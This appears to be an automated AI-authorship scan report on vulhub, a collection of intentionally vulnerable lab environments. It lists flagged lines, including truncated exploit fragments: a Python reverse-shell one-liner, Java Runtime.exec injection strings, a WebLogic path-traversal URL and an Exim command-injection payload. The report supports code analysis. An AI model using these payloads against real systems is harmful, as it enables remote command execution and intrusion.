Pre-Built Vulnerable Environments Based on Docker-Compose
This report presents the forensic synthetic code analysis of vulhub/vulhub, a Dockerfile project with 20,953 GitHub stars. SynthScan v2.0 examined 86,467 lines of code across 1551 source files, recording 173 pattern matches distributed across 17 syntactic categories. The overall adjusted score of 5.0 places this repository in the Low AI signal band.
The scanner applied 160+ deterministic lexical heuristics, multi-line block detectors, abstract syntax tree depth profilers, and a cross-file Jaccard similarity matrix to construct a statistically normalised synthetic code estimate. All matches are individually weighted by severity coefficient and contextual multiplier before summation, and the resulting headline score is temporally discounted to account for the repository's development history relative to the commercial emergence of large language model coding tooling (November 2022 onward).
This chart maps the temporal evolution of the adjusted synthetic code score across successive scan runs. An upward trajectory indicates ongoing incorporation of AI-generated code or expanding LLM-assisted scaffolding; a stable or declining trajectory may reflect active human refactoring, code removal, or the adoption of stricter authorship policies. The dashed secondary line (right axis) independently tracks total raw pattern hit count, which can diverge from the normalised score when codebase size changes significantly between scans.
Classifies detected patterns by their diagnostic confidence and structural impact. CRITICAL patterns (coefficient 10) represent definitive synthetic signatures — hallucinated imports, explicit LLM attribution metadata — virtually never produced by human authors. HIGH (5) indicates strong structural tells such as cross-file repetition or cross-linguistic idioms. MEDIUM (2) covers recognisable conversational padding and AI-specific vocabulary. LOW (1) captures subtle indicators like tautological comments and generic boilerplate that require density to carry independent signal.
This horizontal bar chart decomposes the repository's raw synthetic code score by top-level directory, allowing you to pinpoint precisely which modules or components carry the highest AI authorship density. Directories with disproportionately high scores relative to their size warrant targeted manual review: concentrated AI signatures often trace back to mass-generated configuration layers, auto-ported test suites, LLM-scaffolded boilerplate classes, or entire subsystems authored under heavy copilot assistance. Use this view to prioritise your human code-review effort.
The scanner identified 173 distinct pattern matches across 17 syntactic categories. Each entry below represents a discrete location in the source code where the engine recorded a statistically significant AI authorship indicator. Expand any category row to inspect the individual file paths, line numbers, code snippets, and the lexical context (CODE, COMMENT, or STRING) in which each match was detected.
Reading the findings table: The Severity column indicates the diagnostic confidence level (CRITICAL / HIGH / MEDIUM / LOW). The Context column identifies whether the match occurred inside executable code, an inline comment, or a string literal — comment-context matches receive a ×1.5 weight because LLMs systematically over-annotate. The ⚡ bolt icon marks clustered matches: three or more patterns within a 10-line window, each receiving an additional ×1.5 density multiplier as dense clusters constitute far stronger evidence of synthetic authorship than isolated hits.
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| CRITICAL | activemq/CVE-2022-41678/poc.py | 12 | 'out.println(org.apache.commons.io.IOUtils.toString(p.getInputStream(), "utf-8")); %>') | CODE |
| CRITICAL | weblogic/CVE-2020-14882/README.md | 45 | http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2 | CODE |
| CRITICAL | weblogic/CVE-2020-14882/README.md | 78 | http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.spri | CODE |
| CRITICAL | weblogic/CVE-2020-14882/README.zh-cn.md | 41 | http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2 | CODE |
| CRITICAL | weblogic/CVE-2020-14882/README.zh-cn.md | 74 | http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.spri | CODE |
| CRITICAL⚡ | java/rmi-registry-bind-deserialization-bypass/README.md | 13 | || java.lang.reflect.Proxy.class.isAssignableFrom(clazz) | CODE |
| CRITICAL⚡ | java/rmi-registry-bind-deserialization-bypass/README.md | 17 | || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz) | CODE |
| CRITICAL⚡ | java/rmi-registry-bind-deserialization-bypass/README.md | 18 | || java.rmi.server.UID.class.isAssignableFrom(clazz)) { | CODE |
| CRITICAL⚡ | …i-registry-bind-deserialization-bypass/README.zh-cn.md | 11 | || java.lang.reflect.Proxy.class.isAssignableFrom(clazz) | CODE |
| CRITICAL⚡ | …i-registry-bind-deserialization-bypass/README.zh-cn.md | 15 | || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz) | CODE |
| CRITICAL⚡ | …i-registry-bind-deserialization-bypass/README.zh-cn.md | 16 | || java.rmi.server.UID.class.isAssignableFrom(clazz)) { | CODE |
| CRITICAL | hugegraph/CVE-2024-27348/README.md | 44 | "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect | CODE |
| CRITICAL | hugegraph/CVE-2024-27348/README.zh-cn.md | 42 | "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| MEDIUM⚡ | openclaw/CVE-2026-25253/poc.py | 696 | # ------------------------------------------------------- | COMMENT |
| MEDIUM⚡ | openclaw/CVE-2026-25253/poc.py | 698 | # ------------------------------------------------------- | COMMENT |
| MEDIUM⚡ | openclaw/CVE-2026-25253/poc.py | 704 | # ------------------------------------------------------- | COMMENT |
| MEDIUM⚡ | openclaw/CVE-2026-25253/poc.py | 706 | # ------------------------------------------------------- | COMMENT |
| MEDIUM⚡ | openclaw/CVE-2026-25253/poc.py | 931 | # ------------------------------------------------------- | COMMENT |
| MEDIUM⚡ | openclaw/CVE-2026-25253/poc.py | 933 | # ------------------------------------------------------- | COMMENT |
| MEDIUM | openclaw/CVE-2026-25253/poc.py | 229 | # ------------------------------------------------------- | COMMENT |
| MEDIUM | openclaw/CVE-2026-25253/poc.py | 233 | # ------------------------------------------------------- | COMMENT |
| MEDIUM | openclaw/CVE-2026-25253/poc.py | 669 | # ------------------------------------------------------- | COMMENT |
| MEDIUM | openclaw/CVE-2026-25253/poc.py | 671 | # ------------------------------------------------------- | COMMENT |
| MEDIUM | openclaw/CVE-2026-25253/poc.py | 995 | # ------------------------------------------------------- | COMMENT |
| MEDIUM | openclaw/CVE-2026-25253/poc.py | 997 | # ------------------------------------------------------- | COMMENT |
| MEDIUM | openclaw/CVE-2026-25253/poc.py | 1018 | # ------------------------------------------------------- | COMMENT |
| MEDIUM | openclaw/CVE-2026-25253/poc.py | 1020 | # ------------------------------------------------------- | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW⚡ | openclaw/CVE-2026-25253/poc.py | 932 | # Step 7: Restore original cliBackends config | COMMENT |
| LOW | openclaw/CVE-2026-25253/poc.py | 828 | # Step 5: Set session model to the injected CLI backend | COMMENT |
| LOW | openclaw/CVE-2026-25253/poc.py | 868 | # Step 6: Trigger agent execution — CLI backend spawns command directly | COMMENT |
| LOW | .claude/skills/add-vulhub-env/SKILL.md | 49 | ## Step 1: Research the Vulnerability | COMMENT |
| LOW | .claude/skills/add-vulhub-env/SKILL.md | 60 | ## Step 2: Create Base Dockerfile (if needed) | COMMENT |
| LOW | .claude/skills/add-vulhub-env/SKILL.md | 91 | ## Step 3: Write docker-compose.yml | COMMENT |
| LOW | .claude/skills/add-vulhub-env/SKILL.md | 130 | ## Step 4: Register in environments.toml | COMMENT |
| LOW | .claude/skills/add-vulhub-env/SKILL.md | 171 | ## Step 5: Write Documentation | COMMENT |
| LOW | .claude/skills/add-vulhub-env/SKILL.md | 201 | ## Step 6: Test Locally | COMMENT |
| LOW | .claude/skills/add-vulhub-env/SKILL.md | 226 | ## Step 7: Submit Pull Request | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 214 | # Step 3: RSA-encrypt login credentials and authenticate | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 253 | # Step 1: Download backup | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 263 | # Step 2: Parse encryption key | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 266 | # Step 3: Decrypt backup | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 269 | # Step 4: Extract secrets | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 272 | # Step 5: Exploit with Node Secret | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 279 | # Step 6: Optionally create new admin user and obtain JWT token | COMMENT |
| LOW | nginx-ui/CVE-2026-27944/poc.py | 180 | # Step 1: Create a new admin user via X-Node-Secret | COMMENT |
| LOW | nginx-ui/CVE-2026-27944/poc.py | 195 | # Step 2: Get RSA public key for encrypted login | COMMENT |
| LOW⚡ | craftcms/CVE-2025-32432/poc.py | 178 | # Step 2: Inject PHP payload into session | COMMENT |
| LOW⚡ | craftcms/CVE-2025-32432/poc.py | 183 | # Step 3: Trigger RCE | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW⚡ | openclaw/CVE-2026-25253/poc.py | 536 | except Exception: | CODE |
| LOW⚡ | openclaw/CVE-2026-25253/poc.py | 544 | except Exception: | CODE |
| LOW⚡ | openclaw/CVE-2026-25253/poc.py | 551 | except Exception: | CODE |
| LOW⚡ | openclaw/CVE-2026-25253/poc.py | 692 | except Exception: | CODE |
| LOW | openclaw/CVE-2026-25253/poc.py | 395 | except Exception: | CODE |
| LOW | openclaw/CVE-2026-25253/poc.py | 515 | except Exception: | CODE |
| LOW | openclaw/CVE-2026-25253/poc.py | 624 | except Exception: | CODE |
| LOW | openclaw/CVE-2026-25253/poc.py | 721 | except Exception: | CODE |
| LOW | openclaw/CVE-2026-25253/poc.py | 782 | except Exception: | CODE |
| LOW | openclaw/CVE-2026-25253/poc.py | 816 | except Exception: | CODE |
| LOW | openclaw/CVE-2026-25253/poc.py | 851 | except Exception: | CODE |
| LOW | tests/tools/update_dockerhub.py | 118 | except Exception as e: | STRING |
| MEDIUM | tests/tools/update_dockerhub.py | 112 | def main(): | CODE |
| MEDIUM | tests/tools/check_image_arch.py | 281 | print(f"Error: {args.file} not found.", file=sys.stderr) | CODE |
| LOW | tests/tools/check_image_arch.py | 323 | except Exception as e: | CODE |
| LOW | erlang/CVE-2025-32433/exploit.py | 145 | except Exception as e: | CODE |
| LOW | showdoc/3.2.5-sqli/poc.py | 26 | except Exception as e: | CODE |
| MEDIUM⚡ | superset/CVE-2023-27524/CVE-2023-27524.py | 36 | print(f'Error retrieving login page at {u}, status code: {resp.status_code}') | CODE |
| MEDIUM⚡ | superset/CVE-2023-27524/CVE-2023-27524.py | 46 | print('Error: No session cookie found') | CODE |
| MEDIUM⚡ | superset/CVE-2023-27524/CVE-2023-27524.py | 55 | print('Error: Not a Flask session cookie') | CODE |
| LOW | superset/CVE-2023-27524/CVE-2023-27524.py | 98 | except Exception as e_inner: | CODE |
| LOW | superset/CVE-2023-27524/CVE-2023-27524.py | 119 | except Exception as e_inner: | CODE |
| LOW | superset/CVE-2023-27524/CVE-2023-27524.py | 124 | except Exception as e: | CODE |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 210 | except Exception as e: | CODE |
| LOW | nginx-ui/CVE-2026-27944/poc.py | 83 | except Exception as e: | CODE |
| LOW | zabbix/CVE-2016-10134/CVE-2016-10134.py | 89 | except Exception: | CODE |
| LOW | craftcms/CVE-2025-32432/poc.py | 203 | except Exception as e: | CODE |
| LOW | ingress-nginx/CVE-2025-1974/exploit.py | 113 | except Exception as e: | STRING |
| MEDIUM | ingress-nginx/CVE-2025-1974/exploit.py | 114 | print(f"Error on /proc/{proc}/fd/{fd}: {e}") | STRING |
| MEDIUM | ingress-nginx/CVE-2025-1974/exploit.py | 134 | print(f"Error: Shell file '{shell_file}' not found") | STRING |
| LOW | ingress-nginx/CVE-2025-1974/exploit.py | 150 | except Exception as e: | STRING |
| MEDIUM | ingress-nginx/CVE-2025-1974/exploit.py | 151 | print(f"Error connecting to {host}:{port}: {e} - host is up?") | STRING |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| HIGH | wordpress/pwnscriptum/exploit.py | 17 | return 'target(any -froot@localhost -be %s null)' % command | CODE |
| HIGH | airflow/CVE-2020-11981/exploit_airflow_celery.py | 8 | ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3 | CODE |
| HIGH | jira/CVE-2019-11581/poc.py | 28 | #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) | COMMENT |
| HIGH | jira/CVE-2019-11581/poc.py | 40 | payload = "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('whoa | STRING |
| HIGH | ingress-nginx/CVE-2025-1974/exploit.py | 54 | "creationTimestamp": null, | CODE |
| HIGH | ingress-nginx/CVE-2025-1974/exploit.py | 87 | "oldObject": null, | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW⚡ | openclaw/CVE-2026-25253/poc.py | 932 | # Step 7: Restore original cliBackends config | COMMENT |
| LOW | openclaw/CVE-2026-25253/poc.py | 828 | # Step 5: Set session model to the injected CLI backend | COMMENT |
| LOW | openclaw/CVE-2026-25253/poc.py | 868 | # Step 6: Trigger agent execution — CLI backend spawns command directly | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 214 | # Step 3: RSA-encrypt login credentials and authenticate | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 253 | # Step 1: Download backup | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 263 | # Step 2: Parse encryption key | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 266 | # Step 3: Decrypt backup | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 269 | # Step 4: Extract secrets | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 272 | # Step 5: Exploit with Node Secret | COMMENT |
| LOW⚡ | nginx-ui/CVE-2026-27944/poc.py | 279 | # Step 6: Optionally create new admin user and obtain JWT token | COMMENT |
| LOW | nginx-ui/CVE-2026-27944/poc.py | 180 | # Step 1: Create a new admin user via X-Node-Secret | COMMENT |
| LOW | nginx-ui/CVE-2026-27944/poc.py | 195 | # Step 2: Get RSA public key for encrypted login | COMMENT |
| LOW⚡ | craftcms/CVE-2025-32432/poc.py | 178 | # Step 2: Inject PHP payload into session | COMMENT |
| LOW⚡ | craftcms/CVE-2025-32432/poc.py | 183 | # Step 3: Trigger RCE | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | activemq/CVE-2023-46604/poc.py | 1 | CODE | |
| LOW | activemq/CVE-2022-41678/poc.py | 8 | CODE | |
| LOW | cmsms/CVE-2021-26120/poc.py | 4 | CODE | |
| LOW | python/PIL-CVE-2018-16509/app.py | 1 | CODE | |
| LOW | python/PIL-CVE-2017-8291/app.py | 5 | CODE | |
| LOW | grafana/admin-ssrf/grafana-ssrf.py | 15 | CODE | |
| LOW | airflow/CVE-2020-11981/exploit_airflow_celery.py | 1 | CODE | |
| LOW | opensmtpd/CVE-2020-7247/poc.py | 19 | CODE | |
| LOW | nginx-ui/CVE-2026-27944/poc.py | 24 | CODE | |
| LOW | openssl/CVE-2014-0160/ssltest.py | 12 | CODE | |
| LOW | django/CVE-2020-9402/vuln/views.py | 1 | CODE | |
| LOW | django/CVE-2021-35042/vuln/urls.py | 1 | CODE | |
| LOW | django/CVE-2021-35042/vuln/urls.py | 1 | CODE | |
| LOW | django/CVE-2022-34265/vuln/models.py | 1 | CODE | |
| LOW | django/CVE-2022-34265/vuln/urls.py | 1 | CODE | |
| LOW | django/CVE-2022-34265/vuln/urls.py | 1 | CODE | |
| LOW | django/CVE-2022-34265/vuln/views.py | 1 | CODE | |
| LOW | base/pgadmin/6.16/config_local.py | 1 | CODE | |
| LOW | base/pgadmin/7.6/config_local.py | 1 | CODE | |
| LOW | base/django/2.0.7/app.py | 3 | CODE | |
| LOW | ingress-nginx/CVE-2025-1974/exploit.py | 1 | CODE | |
| LOW | spring/CVE-2025-41242/poc.py | 6 | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | couchdb/CVE-2022-24706/poc.py | 1 | # Exploit Title: Remote Command Execution via Erlang Distribution Protocol | COMMENT |
| LOW | apisix/CVE-2020-13945/config.yml | 1 | # | COMMENT |
| LOW | apisix/CVE-2021-45232/apisix.yml | 1 | # | COMMENT |
| LOW | apisix/CVE-2021-45232/dashboard.yml | 1 | # | COMMENT |
| LOW | openclaw/CVE-2026-25253/poc.py | 221 | websockets.exceptions.ConnectionClosedError) as exc: | COMMENT |
| LOW | thinkphp/in-sqlinjection/www/database.php | 1 | <?php | COMMENT |
| LOW | opensmtpd/CVE-2020-7247/poc.py | 1 | # Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution | COMMENT |
| LOW | base/couchdb/2.1.0/docker-entrypoint.sh | 1 | #!/bin/bash | COMMENT |
| LOW | base/couchdb/3.2.1/docker-entrypoint.sh | 1 | #!/bin/bash | COMMENT |
| LOW | base/couchdb/1.6.0/docker-entrypoint.sh | 1 | #!/bin/bash | COMMENT |
| LOW | base/aj-report/1.4.0/bootstrap.yml | 61 | #若要使用minio文件存储,请启用以下配置 | COMMENT |
| LOW | base/thinkphp/2.1/index.php | 1 | <?php | COMMENT |
| LOW | base/solr/8.6.1/cloud/zoo.cfg | 1 | # The number of milliseconds of each tick | COMMENT |
| LOW | base/solr/8.6.1/cloud/zoo.cfg | 21 | # | COMMENT |
| LOW | base/solr/8.3.0/cloud/zoo.cfg | 1 | # The number of milliseconds of each tick | COMMENT |
| LOW | base/solr/8.3.0/cloud/zoo.cfg | 21 | # | COMMENT |
| LOW | base/superset/2.0.1/run-server.sh | 1 | #!/usr/bin/env bash | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| HIGH | python/unpickle/README.md | 0 | python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("172.18.0.1",80));o | STRING |
| HIGH | python/unpickle/README.zh-cn.md | 0 | python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("172.18.0.1",80));o | STRING |
| HIGH | python/unpickle/exp.py | 0 | python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("172.18.0.1",80));o | STRING |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | activemq/CVE-2022-41678/poc.py | 972 | CODE | |
| LOW | tomcat/CVE-2020-1938/poc.py | 181 | CODE | |
| LOW | openclaw/CVE-2026-25253/poc.py | 457 | CODE | |
| LOW | openclaw/CVE-2026-25253/poc.py | 638 | CODE | |
| LOW | tests/tools/check_image_arch.py | 262 | CODE | |
| LOW | tests/check/test_env_toml.py | 60 | CODE | |
| LOW | superset/CVE-2023-27524/CVE-2023-27524.py | 18 | CODE | |
| LOW | nginx-ui/CVE-2026-27944/poc.py | 88 | CODE | |
| LOW | imagemagick/CVE-2022-44268/poc.py | 41 | CODE | |
| LOW | base/saltstack/2019.2.3/saltinit.py | 8 | CODE | |
| LOW | base/saltstack/3002/saltinit.py | 8 | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | comfyui/CVE-2025-67303/evil-git-server.py | 65 | subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=src_path, check=True, | STRING |
| LOW | nexus/CVE-2020-10204/README.md | 46 | {"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User", | CODE |
| LOW | nexus/CVE-2020-10204/README.zh-cn.md | 43 | {"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User", | CODE |
| LOW | jira/CVE-2019-11581/poc.py | 12 | "from": "test@test.com", | CODE |
| LOW⚡ | base/n8n/1.65.0/docker-entrypoint.sh | 50 | "placeholder": "John Doe" | CODE |
| LOW⚡ | base/n8n/1.65.0/docker-entrypoint.sh | 50 | "placeholder": "John Doe" | CODE |
| LOW⚡ | base/n8n/1.65.0/docker-entrypoint.sh | 56 | "placeholder": "john@example.com" | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | openclaw/CVE-2026-25253/poc.py | 805 | # Check if the connection is still open before deciding. | COMMENT |
| LOW | .github/workflows/update-vulhub-org.yml | 60 | # Check if there are changes to commit | COMMENT |
| LOW | base/n8n/1.65.0/docker-entrypoint.sh | 15 | # Check if admin already exists | COMMENT |
| LOW | base/jenkins/2.46.1/install-plugins.sh | 231 | # Check if there's a version-specific update center, which is the case for LTS versions | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | tomcat/CVE-2020-1938/poc.py | 231 | def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): | CODE |
| LOW | openclaw/CVE-2026-25253/poc.py | 200 | async def _connect_and_authenticate(target, token_data, quiet=False): | CODE |
| LOW | openclaw/CVE-2026-25253/poc.py | 457 | async def _wait_for_gateway_restart(target, max_wait=30, token_data=None): | CODE |
| LOW | tests/check/test_env_toml.py | 60 | def test_dockerfile_covers_all_vulhub_images(): | CODE |
| LOW | php/xdebug-rce/exp.py | 43 | class XDebugRequestHandler(socketserver.BaseRequestHandler): | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| MEDIUM | craftcms/CVE-2025-32432/poc.py | 107 | # Construct the malicious payload using Yii's dependency injection | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| MEDIUM | base/postgres/9.6.7/docker-entrypoint.sh | 40 | # Create the transaction log directory before initdb is run (below) so the directory is owned by the correct user | COMMENT |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | n8n/CVE-2025-68613/exploit.py | 25 | logger = logging.getLogger(__name__) | CODE |
| Severity | File | Line | Snippet | Context |
|---|---|---|---|---|
| LOW | uwsgi/unacc/poc.py | 27 | CODE |